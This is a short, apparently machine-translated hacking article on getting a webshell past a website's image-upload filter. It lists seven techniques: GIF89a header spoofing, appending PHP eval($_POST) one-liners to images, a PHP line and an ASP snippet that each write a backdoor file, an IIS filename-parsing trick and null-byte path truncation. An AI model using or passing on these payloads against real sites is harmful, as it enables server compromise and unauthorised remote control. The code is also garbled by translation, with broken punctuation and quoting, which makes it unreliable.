Several methods of bypassing Filtering for the shell for uploading images

Several methods of bypassing Filtering for the shell for uploading images

Generally, the website image upload function filters files to prevent webshell writing. However, different programs are different in filtering. How can I break through filtering and continue uploading?

This article summarizes seven methods to break through!

1. File Header + GIF89a method. (Php) // This is easy to understand. Write gif89a directly at the beginning of the php horse, and then upload dama. php

2. Use edjpgcom to inject code into images. (Php) // modify edjpgcom and add a php statement to save it as dama. php

3. copy image. GIF + shell. php webshell. php (php) under the cmd command. // It is estimated that the same principle is true for 1, and the upload of webshell. php is spoofed.

4. Open the image in C32asm and add the code in a blank box at the end of the file <? Php eval ($ _ POST [cmd])?> . (Php) // fill in a php sentence and then upload it.

5. Improve the Code on the basis of 4 <? Php fputs (fopen ("error. php". "w"). "<? Eval (\$ _ POST [cmd]) ;?> ")?> . (Php) // generate error. php in the same directory. Question: How to rewrite asp?

A: The result of the asp test is: no permission...

<% Set MyFileObject = Server. createObject ("Scripting. fileSystemObject ") Set MyTextFile = MyFileObject. createTextFile ("kafei. asp ") MyTextFile. writeLine ("\ <\ % eval request (chr (35) \ % \>") MyTextFile. close %>

6、iis directory name leakage 1.php).jpg (jpg) // This is the file name variable is not filtered.

7. The path name and file name of the nc packet capture data are not filtered.

// Modify the upload path by capturing packets using/upload/1.asp+ space, and use the software to fill the space with 00. Then the nc submits the request to obtain the webshell.